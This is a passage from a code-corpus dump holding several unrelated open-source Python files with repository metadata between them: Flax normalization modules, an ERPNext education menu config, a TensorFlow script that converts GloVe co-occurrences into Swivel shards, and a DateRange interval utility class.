"""
start = start_time
ans = []
while start <= end_time:
date = start.strftime("%Y-%m-%d")
ans.append(dict(date=date, count=data.get(date, 0)))
start += timedelta(days=1)
return ans
| 40.405479
| 119
| 0.558991
|
e0b068616ca9c184341effbd6d2b8d92adf8556c
| 10,687
|
py
|
Python
|
flax/linen/normalization.py
|
joelgarde/flax
|
7d12d20f8272ce9c639711e92db89fdaf7f1a94a
|
[
"Apache-2.0"
] | null | null | null |
flax/linen/normalization.py
|
joelgarde/flax
|
7d12d20f8272ce9c639711e92db89fdaf7f1a94a
|
[
"Apache-2.0"
] | null | null | null |
flax/linen/normalization.py
|
joelgarde/flax
|
7d12d20f8272ce9c639711e92db89fdaf7f1a94a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 The Flax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Normalization modules for Flax."""
from typing import (Any, Callable, Optional, Tuple)
from jax import lax
from jax.nn import initializers
import jax.numpy as jnp
from flax.linen.module import Module, compact, merge_param
PRNGKey = Any
Array = Any
Shape = Tuple[int]
Dtype = Any # this could be a real type?
_no_init = lambda rng, shape: ()
def _absolute_dims(rank, dims):
return tuple([rank + dim if dim < 0 else dim for dim in dims])
class BatchNorm(Module):
"""BatchNorm Module.
Attributes:
use_running_average: if True, the statistics stored in batch_stats
will be used instead of computing the batch statistics on the input.
axis: the feature or non-batch axis of the input.
momentum: decay rate for the exponential moving average of
the batch statistics.
epsilon: a small float added to variance to avoid dividing by zero.
dtype: the dtype of the computation (default: float32).
use_bias: if True, bias (beta) is added.
use_scale: if True, multiply by scale (gamma).
When the next layer is linear (also e.g. nn.relu), this can be disabled
since the scaling will be done by the next layer.
bias_init: initializer for bias, by default, zero.
scale_init: initializer for scale, by default, one.
axis_name: the axis name used to combine batch statistics from multiple
devices. See `jax.pmap` for a description of axis names (default: None).
axis_index_groups: groups of axis indices within that named axis
representing subsets of devices to reduce over (default: None). For
example, `[[0, 1], [2, 3]]` would independently batch-normalize over
the examples on the first two and last two devices. See `jax.lax.psum`
for more details.
"""
use_running_average: Optional[bool] = None
axis: int = -1
momentum: float = 0.99
epsilon: float = 1e-5
dtype: Dtype = jnp.float32
use_bias: bool = True
use_scale: bool = True
bias_init: Callable[[PRNGKey, Shape, Dtype], Array] = initializers.zeros
scale_init: Callable[[PRNGKey, Shape, Dtype], Array] = initializers.ones
axis_name: Optional[str] = None
axis_index_groups: Any = None
@compact
def __call__(self, x, use_running_average: Optional[bool] = None):
"""Normalizes the input using batch statistics.
Args:
x: the input to be normalized.
use_running_average: if true, the statistics stored in batch_stats
will be used instead of computing the batch statistics on the input.
Returns:
Normalized inputs (the same shape as inputs).
"""
use_running_average = merge_param(
'use_running_average', self.use_running_average, use_running_average)
x = jnp.asarray(x, jnp.float32)
axis = self.axis if isinstance(self.axis, tuple) else (self.axis,)
axis = _absolute_dims(x.ndim, axis)
feature_shape = tuple(d if i in axis else 1 for i, d in enumerate(x.shape))
reduced_feature_shape = tuple(d for i, d in enumerate(x.shape) if i in axis)
reduction_axis = tuple(i for i in range(x.ndim) if i not in axis)
# we detect if we're in initialization via empty variable tree.
initializing = not self.has_variable('batch_stats', 'mean')
ra_mean = self.variable('batch_stats', 'mean',
lambda s: jnp.zeros(s, jnp.float32),
reduced_feature_shape)
ra_var = self.variable('batch_stats', 'var',
lambda s: jnp.ones(s, jnp.float32),
reduced_feature_shape)
if use_running_average:
mean, var = ra_mean.value, ra_var.value
else:
mean = jnp.mean(x, axis=reduction_axis, keepdims=False)
mean2 = jnp.mean(lax.square(x), axis=reduction_axis, keepdims=False)
if self.axis_name is not None and not initializing:
concatenated_mean = jnp.concatenate([mean, mean2])
mean, mean2 = jnp.split(
lax.pmean(
concatenated_mean,
axis_name=self.axis_name,
axis_index_groups=self.axis_index_groups), 2)
var = mean2 - lax.square(mean)
if not initializing:
ra_mean.value = self.momentum * ra_mean.value + (1 - self.momentum) * mean
ra_var.value = self.momentum * ra_var.value + (1 - self.momentum) * var
y = x - mean.reshape(feature_shape)
mul = lax.rsqrt(var + self.epsilon)
if self.use_scale:
scale = self.param('scale',
self.scale_init,
reduced_feature_shape).reshape(feature_shape)
mul = mul * scale
y = y * mul
if self.use_bias:
bias = self.param('bias',
self.bias_init,
reduced_feature_shape).reshape(feature_shape)
y = y + bias
return jnp.asarray(y, self.dtype)
class LayerNorm(Module):
"""Layer normalization (https://arxiv.org/abs/1607.06450).
Operates on the last axis of the input data.
It normalizes the activations of the layer for each given example in a
batch independently, rather than across a batch like Batch Normalization.
i.e. applies a transformation that maintains the mean activation within
each example close to 0 and the activation standard deviation close to 1.
Attributes:
epsilon: A small float added to variance to avoid dividing by zero.
dtype: the dtype of the computation (default: float32).
use_bias: If True, bias (beta) is added.
use_scale: If True, multiply by scale (gamma). When the next layer is linear
(also e.g. nn.relu), this can be disabled since the scaling will be done
by the next layer.
bias_init: Initializer for bias, by default, zero.
scale_init: Initializer for scale, by default, one.
"""
epsilon: float = 1e-6
dtype: Any = jnp.float32
use_bias: bool = True
use_scale: bool = True
bias_init: Callable[[PRNGKey, Shape, Dtype], Array] = initializers.zeros
scale_init: Callable[[PRNGKey, Shape, Dtype], Array] = initializers.ones
@compact
def __call__(self, x):
"""Applies layer normalization on the input.
Args:
x: the inputs
Returns:
Normalized inputs (the same shape as inputs).
"""
x = jnp.asarray(x, jnp.float32)
features = x.shape[-1]
mean = jnp.mean(x, axis=-1, keepdims=True)
mean2 = jnp.mean(lax.square(x), axis=-1, keepdims=True)
var = mean2 - lax.square(mean)
mul = lax.rsqrt(var + self.epsilon)
if self.use_scale:
mul = mul * jnp.asarray(
self.param('scale', self.scale_init, (features,)),
self.dtype)
y = (x - mean) * mul
if self.use_bias:
y = y + jnp.asarray(
self.param('bias', self.bias_init, (features,)),
self.dtype)
return jnp.asarray(y, self.dtype)
class GroupNorm(Module):
"""Group normalization (arxiv.org/abs/1803.08494).
This op is similar to batch normalization, but statistics are shared across
equally-sized groups of channels and not shared across batch dimension.
Thus, group normalization does not depend on the batch composition and does
not require maintaining internal state for storing statistics.
The user should either specify the total number of channel groups or the
number of channels per group.
Attributes:
num_groups: the total number of channel groups. The default value of 32 is
proposed by the original group normalization paper.
group_size: the number of channels in a group.
epsilon: A small float added to variance to avoid dividing by zero.
dtype: the dtype of the computation (default: float32).
use_bias: If True, bias (beta) is added.
use_scale: If True, multiply by scale (gamma). When the next layer is linear
(also e.g. nn.relu), this can be disabled since the scaling will be done
by the next layer.
bias_init: Initializer for bias, by default, zero.
scale_init: Initializer for scale, by default, one.
"""
num_groups: int = 32
group_size: Optional[int] = None
epsilon: float = 1e-6
dtype: Any = jnp.float32
use_bias: bool = True
use_scale: bool = True
bias_init: Callable[[PRNGKey, Shape, Dtype], Array] = initializers.zeros
scale_init: Callable[[PRNGKey, Shape, Dtype], Array] = initializers.ones
@compact
def __call__(self, x):
"""Applies group normalization to the input (arxiv.org/abs/1803.08494).
Args:
x: the input of shape N...C, where N is a batch dimension and C is a
channels dimensions. `...` represents an arbitrary number of extra
dimensions that are used to accumulate statistics over.
Returns:
Normalized inputs (the same shape as inputs).
"""
x = jnp.asarray(x, jnp.float32)
if ((self.num_groups is None and self.group_size is None) or
(self.num_groups is not None and self.group_size is not None)):
raise ValueError('Either `num_groups` or `group_size` should be '
'specified, but not both of them.')
num_groups = self.num_groups
if self.group_size is not None:
channels = x.shape[-1]
if channels % self.group_size != 0:
raise ValueError('Number of channels ({}) is not multiple of the '
'group size ({}).'.format(channels, self.group_size))
num_groups = channels // self.group_size
input_shape = x.shape
group_shape = x.shape[:-1] + (num_groups, x.shape[-1] // num_groups)
x = x.reshape(group_shape)
reduction_axis = [d for d in range(1, x.ndim - 2)] + [x.ndim - 1]
mean = jnp.mean(x, axis=reduction_axis, keepdims=True)
mean_of_squares = jnp.mean(jnp.square(x), axis=reduction_axis,
keepdims=True)
var = mean_of_squares - jnp.square(mean)
x = (x - mean) * lax.rsqrt(var + self.epsilon)
x = x.reshape(input_shape)
feature_shape = tuple([1 for d in input_shape[:-1]] + [input_shape[-1]])
if self.use_scale:
x = x * self.param('scale', self.scale_init, feature_shape)
if self.use_bias:
x = x + self.param('bias', self.bias_init, feature_shape)
return x.astype(self.dtype)
| 39.435424
| 82
| 0.671657
|
5a05a258b21d18a0d3cef79cb27d9edadd65fb42
| 4,334
|
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/config/education.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/config/education.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/config/education.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals
from frappe import _
def get_data():
return [
{
"label": _("Student"),
"items": [
{
"type": "doctype",
"name": "Student"
},
{
"type": "doctype",
"name": "Guardian"
},
{
"type": "doctype",
"name": "Student Log"
},
{
"type": "doctype",
"name": "Student Group"
}
]
},
{
"label": _("Admission"),
"items": [
{
"type": "doctype",
"name": "Student Applicant"
},
{
"type": "doctype",
"name": "Student Admission"
},
{
"type": "doctype",
"name": "Program Enrollment"
}
]
},
{
"label": _("Attendance"),
"items": [
{
"type": "doctype",
"name": "Student Attendance"
},
{
"type": "doctype",
"name": "Student Leave Application"
},
{
"type": "report",
"is_query_report": True,
"name": "Absent Student Report",
"doctype": "Student Attendance"
},
{
"type": "report",
"is_query_report": True,
"name": "Student Batch-Wise Attendance",
"doctype": "Student Attendance"
},
]
},
{
"label": _("Tools"),
"items": [
{
"type": "doctype",
"name": "Student Attendance Tool"
},
{
"type": "doctype",
"name": "Assessment Result Tool"
},
{
"type": "doctype",
"name": "Student Group Creation Tool"
},
{
"type": "doctype",
"name": "Program Enrollment Tool"
},
{
"type": "doctype",
"name": "Course Scheduling Tool"
}
]
},
{
"label": _("Assessment"),
"items": [
{
"type": "doctype",
"name": "Assessment Plan"
},
{
"type": "doctype",
"name": "Assessment Group",
"link": "Tree/Assessment Group",
},
{
"type": "doctype",
"name": "Assessment Result"
},
{
"type": "doctype",
"name": "Assessment Criteria"
}
]
},
{
"label": _("Assessment Reports"),
"items": [
{
"type": "report",
"is_query_report": True,
"name": "Course wise Assessment Report",
"doctype": "Assessment Result"
},
{
"type": "report",
"is_query_report": True,
"name": "Final Assessment Grades",
"doctype": "Assessment Result"
},
{
"type": "report",
"is_query_report": True,
"name": "Assessment Plan Status",
"doctype": "Assessment Plan"
},
{
"type": "doctype",
"name": "Student Report Generation Tool"
}
]
},
{
"label": _("Fees"),
"items": [
{
"type": "doctype",
"name": "Fees"
},
{
"type": "doctype",
"name": "Fee Schedule"
},
{
"type": "doctype",
"name": "Fee Structure"
},
{
"type": "doctype",
"name": "Fee Category"
}
]
},
{
"label": _("Schedule"),
"items": [
{
"type": "doctype",
"name": "Course Schedule",
"route": "List/Course Schedule/Calendar"
},
{
"type": "doctype",
"name": "Course Scheduling Tool"
}
]
},
{
"label": _("Masters"),
"items": [
{
"type": "doctype",
"name": "Course"
},
{
"type": "doctype",
"name": "Program"
},
{
"type": "doctype",
"name": "Instructor"
},
{
"type": "doctype",
"name": "Room"
}
]
},
{
"label": _("Setup"),
"items": [
{
"type": "doctype",
"name": "Student Category"
},
{
"type": "doctype",
"name": "Student Batch Name"
},
{
"type": "doctype",
"name": "Grading Scale"
},
{
"type": "doctype",
"name": "Academic Term"
},
{
"type": "doctype",
"name": "Academic Year"
},
{
"type": "doctype",
"name": "Education Settings"
}
]
},
{
"label": _("Other Reports"),
"items": [
{
"type": "report",
"is_query_report": True,
"name": "Student and Guardian Contact Details",
"doctype": "Program Enrollment"
},
{
"type": "report",
"is_query_report": True,
"name": "Student Monthly Attendance Sheet",
"doctype": "Student Attendance"
},
{
"type": "report",
"name": "Student Fee Collection",
"doctype": "Fees",
"is_query_report": True
}
]
}
]
| 17.130435
| 52
| 0.461467
|
1a24d48adcbdb427d7f7f17b52046e706d6c7775
| 5,881
|
py
|
Python
|
swivel/glove_to_shards.py
|
robrkerr/tensorflow-models
|
3656a07e89be134c2bc333c60a6c709e475024a6
|
[
"Apache-2.0"
] | 308
|
2018-09-06T18:46:57.000Z
|
2022-03-28T08:22:45.000Z
|
swivel/glove_to_shards.py
|
robrkerr/tensorflow-models
|
3656a07e89be134c2bc333c60a6c709e475024a6
|
[
"Apache-2.0"
] | 64
|
2018-06-20T10:14:17.000Z
|
2021-09-08T05:58:25.000Z
|
swivel/glove_to_shards.py
|
robrkerr/tensorflow-models
|
3656a07e89be134c2bc333c60a6c709e475024a6
|
[
"Apache-2.0"
] | 69
|
2018-09-18T12:06:56.000Z
|
2022-03-14T11:49:16.000Z
|
#!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Converts a Glove binary co-occurrence matrix into Swivel shards.
Usage:
glove_to_shards.py --input <coocs> --vocab <vocab> --output_dir <output_dir>
Options
--input <coocs>
The Glove co-occurrence file.
--vocab <vocab>
Path to the vocabulary text file, one token per line.
--output_dir <directory>
Specifies the touput directory where the various Swivel data
files sohuld be placed.
--shard_size <int>
Specifies the shard size; default 4096.
"""
from __future__ import print_function
import itertools
import os
import struct
import sys
import tensorflow as tf
flags = tf.app.flags
flags.DEFINE_string('input', 'coocurrences.bin', 'Vocabulary file')
flags.DEFINE_string('vocab', 'vocab.txt', 'Vocabulary file')
flags.DEFINE_string('output_dir', '/tmp/swivel_data', 'Output directory')
flags.DEFINE_integer('shard_size', 4096, 'Shard size')
FLAGS = tf.app.flags.FLAGS
glove_cooc_fmt = struct.Struct('iid')
shard_cooc_fmt = struct.Struct('if')
def make_shard_files(coocs, nshards, vocab_sz):
"""Chops the binary Glove co-occurrence matrix into shards.
This reads the Glove binary co-occurrence file and assigns individual
co-occurrence counts to the appropriate Swivel shard.
Args:
coocs: the co-occurrnece file to read
nshards: the number of shards along one dimension of the square matrix
vocab_sz: the vocabulary size
Returns:
A (shard_table, marginals) tuple. The shard_table maps the row and column
shard ID to a file handle containing the co-occurrences for that shard; the
marginals contain the marginal sums.
"""
row_sums = [0] * vocab_sz
col_sums = [0] * vocab_sz
coocs.seek(0, os.SEEK_END)
ncoocs = coocs.tell() / glove_cooc_fmt.size
coocs.seek(0, os.SEEK_SET)
shard_files = {}
for row in range(nshards):
for col in range(nshards):
filename = os.path.join(
FLAGS.output_dir, 'shard-%03d-%03d.bin' % (row, col))
shard_files[(row, col)] = open(filename, 'w+')
for ix in xrange(ncoocs):
if ix % 1000000 == 0:
sys.stdout.write('\rsharding co-occurrences: %0.1f%% (%d/%d)' % (
100.0 * ix / ncoocs, ix, ncoocs))
sys.stdout.flush()
bits = coocs.read(glove_cooc_fmt.size)
if not bits:
break
# Glove has 1-indexed IDs.
row_id, col_id, cnt = glove_cooc_fmt.unpack(bits)
if row_id > vocab_sz or col_id > vocab_sz:
continue
row_id -= 1
row_shard = row_id % nshards
row_off = row_id / nshards
col_id -= 1
col_shard = col_id % nshards
col_off = col_id / nshards
shard_pos = row_off * FLAGS.shard_size + col_off # row major
shard_files[(row_shard, col_shard)].write(
shard_cooc_fmt.pack(shard_pos, cnt))
# Accumulate marginals.
row_sums[row_id] += cnt
col_sums[col_id] += cnt
sys.stdout.write('\n')
if any(abs(r - c) > 0.1 for r, c in itertools.izip(row_sums, col_sums)):
print('WARNING! Row and column marginals differ; is your matrix symmetric?',
file=sys.stderr)
return (shard_files, row_sums)
def main(_):
with open(FLAGS.vocab, 'r') as lines:
orig_vocab_sz = sum(1 for _ in lines)
shard_sz = FLAGS.shard_size
vocab_sz = orig_vocab_sz - orig_vocab_sz % shard_sz
nshards = vocab_sz / shard_sz
print('vocab size is %d (originally %d), %d %dx%d-element shards' % (
vocab_sz, orig_vocab_sz, nshards * nshards, shard_sz, shard_sz))
# Create the output directory, if necessary
if FLAGS.output_dir and not os.path.isdir(FLAGS.output_dir):
os.makedirs(FLAGS.output_dir)
with open(FLAGS.input, 'r') as coocs:
shard_files, marginals = make_shard_files(coocs, nshards, vocab_sz)
# Now sort the shards and write the TFRecords.
filename = os.path.join(FLAGS.output_dir, 'shards.recs')
with tf.python_io.TFRecordWriter(filename) as writer:
ix = 0
for (row, col), fh in shard_files.iteritems():
ix += 1
sys.stdout.write('\rwriting shard %d/%d' % (ix, len(shard_files)))
sys.stdout.flush()
fh.seek(0)
buf = fh.read()
os.unlink(fh.name)
fh.close()
coocs = [
shard_cooc_fmt.unpack_from(buf, off)
for off in range(0, len(buf), shard_cooc_fmt.size)]
# N.B. we assume that there aren't any duplicates here!
coocs.sort(key=lambda kv: kv[0])
def _int64s(xs):
return tf.train.Feature(int64_list=tf.train.Int64List(value=list(xs)))
def _floats(xs):
return tf.train.Feature(float_list=tf.train.FloatList(value=list(xs)))
example = tf.train.Example(features=tf.train.Features(feature={
'global_row': _int64s(row + nshards * i for i in range(shard_sz)),
'global_col': _int64s(col + nshards * i for i in range(shard_sz)),
'sparse_local_row': _int64s(pos / shard_sz for pos, _ in coocs),
'sparse_local_col': _int64s(pos % shard_sz for pos, _ in coocs),
'sparse_value': _floats(cnt for _, cnt in coocs)}))
writer.write(example.SerializeToString())
print('\nwriting marginals...')
with open(os.path.join(FLAGS.output_dir, 'marginals.txt'), 'w') as fh:
for cnt in marginals:
fh.write('%0.1f\n' % cnt)
print('done!')
if __name__ == '__main__':
tf.app.run()
| 29.70202
| 80
| 0.679986
|
f45e80ca902986b8ba39279d9d9ce7dc67dcd93d
| 17,168
|
py
|
Python
|
daterange.py
|
Derek-Strasters/daterange
|
999450a7e3351d67d1cd3726b4d07bc097e7f0aa
|
[
"MIT"
] | 1
|
2021-10-11T05:58:09.000Z
|
2021-10-11T05:58:09.000Z
|
daterange.py
|
Derek-Strasters/daterange
|
999450a7e3351d67d1cd3726b4d07bc097e7f0aa
|
[
"MIT"
] | null | null | null |
daterange.py
|
Derek-Strasters/daterange
|
999450a7e3351d67d1cd3726b4d07bc097e7f0aa
|
[
"MIT"
] | null | null | null |
from datetime import timedelta, date
from typing import Optional, Union, List
_DAY = timedelta(days=1)
def type_check(func):
def wrapper(*args, **kwargs):
if not isinstance(args[1], DateRange):
if isinstance(args[1], date):
day_range = DateRange(args[1], args[1])
args = (args[0], day_range, *args[2:]) if len(args) > 2 else (args[0], day_range)
else:
def not_implemented():
return NotImplemented
return not_implemented()
return func(*args, **kwargs)
return wrapper
class DateRange:
"""
Contains a range of dates that are not necessarily contiguous.
Intervals can be constructed with dates and added with the familiar
numerical operators.
Adding:
>>> my_range = DateRange(date(2021, 8, 1), date(2021, 8, 31)) # All of Aug
>>> my_range += DateRange(date(2021, 10, 1), date(2021, 10, 31)) # All of Aug and Oct
>>> print(my_range)
from 2021-08-01 to 2021-08-31 and
from 2021-10-01 to 2021-10-31
>>> august = DateRange(date(2021, 8, 1), date(2021, 8, 31))
>>> september = DateRange(date(2021, 9, 1), date(2021, 9, 30))
>>> july = DateRange(date(2021, 7, 1), date(2021, 7, 31))
>>> august + september + july == DateRange(date(2021, 7, 1), date(2021, 9, 30))
True
datetime.date object can be checked if it falls within a DateRange:
>>> date(2021, 8, 17) in august # Is Aug 17th in the range?
True
>>> date(2021, 9, 10) in august # Is Sep 10th in the range?
False
This works with DateRanges as well:
>>> august in DateRange(date(2021, 7, 1), date(2021, 9, 30))
True
DateRanges can also be intersected with and subtracted from one another:
>>> jul_2_sep = august + september + july
>>> print(jul_2_sep - august)
from 2021-07-01 to 2021-07-31 and
from 2021-09-01 to 2021-09-30
>>> jul_2_aug = july + august
>>> aug_2_sep = august + september
>>> print(jul_2_aug & aug_2_sep)
from 2021-08-01 to 2021-08-31
Taking inspiration from the way we refer to dates with language, DateRanges
are treated inclusively as this is the most idiomatic approach.
For example when we say "for the month of August" we mean every day
within the month, or when we say "Monday through Friday" we mean the
entirety of each day and not just the delta time.
For example:
>>> date(2021, 8, 31) in august
True
>>> date(2021, 8, 1) in august
True
>>> DateRange(date(2021, 8, 1), date(2021, 8, 31)).days
31
If the start day or end day is None, the range will be extended from the
end or beggining of time to the start or end day.
If the start day is before the end day, the range will include all time
except for that between the start date and end date
If the start day is exactly one day after the end day the range will be all
time.
"""
__slots__ = '_intervals'
class Interval:
__slots__ = 'start', 'end'
max = date.max
min = date.min
def __init__(self,
start: Optional[date] = None,
end: Optional[date] = None):
self.start = start if start else self.min
self.end = end if end else self.max
if self.start > self.end:
raise ValueError(f"End cannot be before start: {start} > {end}")
def __contains__(self, other: Union[date, 'DateRange.Interval']):
"""If a date or DateRange is entirely within this DateRange (Inclusive of end date)"""
if isinstance(other, date):
return self.date_in(other)
return self.start <= other.start and self.end >= other.end
def date_in(self, _date: date):
return self.end >= _date >= self.start
def __eq__(self, other):
return self.start == other.start and self.end == other.end
def __lt__(self, other: Union['DateRange.Interval', date]):
"""If this DateRange is entirely before another DateRange"""
return self.end < other.start if isinstance(other, type(self)) else self.end < other
def __gt__(self, other: Union['DateRange.Interval', date]):
"""If this DateRange is entirely after another DateRange"""
return self.start > other.end if isinstance(other, type(self)) else self.start > other
def __and__(self, other: 'DateRange.Interval') -> Union[None, 'DateRange.Interval']:
"""Intersection"""
start = self.start if self.start >= other.start else other.start
end = self.end if self.end <= other.end else other.end
return type(self)(start, end) if start <= end else None
def __sub__(self, other: 'DateRange.Interval') -> List['DateRange.Interval']:
"""Remove dates where another Interval intersects this one. Returns a list of Intervals"""
if self.start < other.start:
if self.end >= other.start:
if self.end > other.end:
return [type(self)(self.start, other.start - _DAY),
type(self)(other.end + _DAY, self.end)] # (..[::]..)
return [type(self)(self.start, other.start - _DAY), ] # (...[:::]) (..[::)..]
return [self.copy(), ] # (..) [..]
if self.start > other.end:
return [self.copy(), ] # [..] (..)
if self.end > other.end:
return [type(self)(other.end + _DAY, self.end), ] # [..(::]..) ([:::]...)
return [] # [(::::::)] [..(::)..] [(:::)...] [...(:::)]
def __repr__(self):
return f"Interval({self.start}, {self.end})"
__str__ = __repr__
def intersects(self, other: 'DateRange.Interval') -> bool:
return self.end >= other.start and self.start <= other.end
def not_intersects(self, other: 'DateRange.Interval') -> bool:
return self.end < other.start or self.start > other.end
def r_butted(self, other: 'DateRange.Interval') -> bool:
"""Is the end of this date interval butted against another interval?"""
return other.start - self.end == _DAY
def l_butted(self, other: 'DateRange.Interval') -> bool:
"""Is the start of this date interval butted against another interval?"""
return self.start - other.end == _DAY
def delta(self) -> timedelta:
return self.end - self.start
def copy(self):
return type(self)(self.start, self.end)
@property
def days(self) -> int:
return self.delta().days + 1
def __init__(self,
start: Optional[date] = None,
end: Optional[date] = None):
self._intervals = []
self._add_init_range(start, end)
def _add_init_range(self, start, end):
if not start and not end:
return
if start and end:
# If the start is larger than the end we use two intervals
# from the beginning of time to end date
# from the start date to the end of time
if start > end:
if start - end <= _DAY:
# All of time
self._intervals.append(self.Interval(None, None))
return
else:
self._intervals.append(self.Interval(None, end))
self._intervals.append(self.Interval(start, None))
return
self._intervals.append(self.Interval(start, end))
@classmethod
def from_list(cls, ranges: List[Union['DateRange', 'DateRange.Interval', date]]) -> 'DateRange':
new = cls()
# TODO: use sorted for better performance
for item in ranges:
if isinstance(item, cls.Interval):
new_new = cls()
cls()._intervals = [item]
new += new_new
if isinstance(item, (DateRange, date)):
new += item
continue
raise TypeError(f'Cannot create range from type: {type(item)}')
return new
def copy(self) -> 'DateRange':
new: DateRange = type(self)(None, None)
new._intervals = [interval.copy() for interval in self]
return new
@property
def days(self) -> int:
"""Return the number of days in the DateRange (inclusive)"""
return sum(interval.days for interval in self)
@property
def intervals(self) -> List[Interval]:
"""List of date intervals within the DateRange"""
return self._intervals
@property
def earliest(self) -> date:
"""The earliest day in the DateRange"""
return self.intervals[0].start if self.intervals else None
@property
def latest(self) -> date:
"""The latests day in the DateRange"""
return self.intervals[-1].end if self.intervals else None
@classmethod
def all_time(cls):
return cls(date.min, date.max)
def __iter__(self):
"""Iterate over the intervals"""
for interval in self.intervals:
yield interval
def __len__(self):
"""Return the number of intervals"""
return len(self.intervals)
@type_check
def __eq__(self, other: Union[date, 'DateRange']):
if len(self) != len(other):
return False
return all(interval[0] == interval[1] for interval in zip(self, other))
@type_check
def __gt__(self, other):
"""All time intervals are entirely after all of another date range's time intervals"""
return self.earliest > other.latest if self.earliest and other.latest else None
@type_check
def __lt__(self, other):
"""All time intervals are entirely before all of another date range's time intervals"""
return self.latest < other.earliest if self.latest and other.earliest else None
def __contains__(self, other: Union[date, 'DateRange']):
"""If another DateRange (or date) is entirely within this DateRange (inclusive of end date)"""
if not isinstance(other, DateRange):
if isinstance(other, date):
return any(other in _range for _range in self)
return NotImplemented
queries = iter(other.intervals)
intervals = iter(self.intervals)
total_hits = 0
interval = next(intervals, None)
query = next(queries, None)
while interval and query:
# Since queries should always be smaller or equal if true, they are advanced first
if query < interval:
query = next(queries, None)
continue
if query in interval:
total_hits += 1
query = next(queries, None)
continue
if interval < query:
interval = next(intervals, None)
continue
# This accounts for queries that overlap intervals, and queries that are larger than the interval
return False
return total_hits == len(other.intervals)
def _interval_intersect(self, other: 'DateRange') -> 'DateRange':
if not isinstance(other, DateRange):
if isinstance(other, date):
if other in self:
return type(self)(other, other)
self._intervals = []
return self
return NotImplemented
intervals = self._sorted_interval_iter(self.intervals, other.intervals)
new_intervals = []
interval = next(intervals, None)
next_interval = next(intervals, None)
while interval and next_interval:
intersection = interval & next_interval
if intersection:
new_intervals.append(intersection.copy())
if next_interval.end > interval.end:
interval = next_interval
next_interval = next(intervals, None)
self._intervals = new_intervals
return self
def __and__(self, other: Union[date, 'DateRange']) -> 'DateRange':
"""Return the intersection of date ranges or an empty DateRange if they do not intersect"""
return self.copy()._interval_intersect(other)
__rand__ = __and__
def __iand__(self, other: Union[date, 'DateRange']) -> 'DateRange':
return self._interval_intersect(other)
def _interval_union(self, other: 'DateRange') -> 'DateRange':
intervals = self._sorted_interval_iter(self.intervals, other.intervals)
new_intervals = []
interval = next(intervals, None)
next_interval = next(intervals, None)
while interval and next_interval:
if interval < next_interval and not interval.r_butted(next_interval):
new_intervals.append(interval.copy())
interval = next_interval
next_interval = next(intervals, None)
continue
if next_interval.end > interval.end:
interval.end = next_interval.end
next_interval = next(intervals, None)
self._intervals = new_intervals + [interval] if interval else []
return self
@type_check
def __or__(self, other: Union[date, 'DateRange']) -> 'DateRange':
"""Return the Union of date ranges"""
return self.copy()._interval_union(other)
__ror__ = __or__
__add__ = __or__
__radd__ = __or__
@type_check
def __ior__(self, other: Union[date, 'DateRange']) -> 'DateRange':
return self._interval_union(other)
__iadd__ = __ior__
def _interval_subtract(self, other: 'DateRange') -> 'DateRange':
# TODO: would it be easier to invert the subtrahend and intersect them?
intervals = iter(self.intervals)
subtrahends = iter(other.intervals)
new_intervals = []
temp_intervals = []
interval = next(intervals, None)
subtrahend = next(subtrahends, None)
while interval and subtrahend:
if subtrahend < interval:
subtrahend = next(subtrahends, None)
if subtrahend is None:
new_intervals.append(interval)
continue
if interval < subtrahend:
new_intervals.append(interval)
interval = next(intervals, None)
continue
# The subtrahend must be overlapping the interval at this point so we subtract
temp_intervals += interval - subtrahend
# If a portion of the interval extends past the subtrahend
if subtrahend.end < interval.end:
subtrahend = next(subtrahends, None)
if subtrahend is not None:
interval = temp_intervals.pop()
else:
interval = next(intervals, None)
new_intervals += temp_intervals
temp_intervals.clear()
self._intervals = new_intervals + temp_intervals + list(intervals)
return self
@type_check
def __sub__(self, other: Union[date, 'DateRange']) -> 'DateRange':
return self.copy()._interval_subtract(other)
@type_check
def __rsub__(self, other: Union[date, 'DateRange']) -> 'DateRange':
# ORDER IS IMPORTANT HERE
return other._interval_subtract(self)
@type_check
def __isub__(self, other: Union[date, 'DateRange']) -> 'DateRange':
return self._interval_subtract(other)
def __repr__(self):
return f"DateRange[{len(self)}]({self.earliest}, {self.latest})"
def __str__(self):
return ' and\n'.join([f"from {inter.start} to {inter.end}" for inter in self])
@staticmethod
def _sorted_interval_iter(interval_list_1: List[Interval], interval_list_2: List[Interval]):
# Assumes the individual intervals are already in ascending order
intervals_1 = iter(interval_list_1)
intervals_2 = iter(interval_list_2)
interval_1 = next(intervals_1, None)
interval_2 = next(intervals_2, None)
while interval_1 or interval_2:
if interval_1 and interval_2:
if interval_1.start < interval_2.start:
yield interval_1.copy()
interval_1 = next(intervals_1, None)
continue
if interval_1.start > interval_2.start:
yield interval_2.copy()
interval_2 = next(intervals_2, None)
continue
if interval_1.end <= interval_2.end:
yield interval_1.copy()
interval_1 = next(intervals_1, None)
continue
yield interval_2.copy()
interval_2 = next(intervals_2, None)
continue
if interval_1:
yield interval_1.copy()
interval_1 = next(intervals_1, None)
continue
yield interval_2.copy()
interval_2 = next(intervals_2, None)
| 38.666667
| 109
| 0.586789
|
8b7c579ff1c5c5c386752b0579ca7b9867f08206
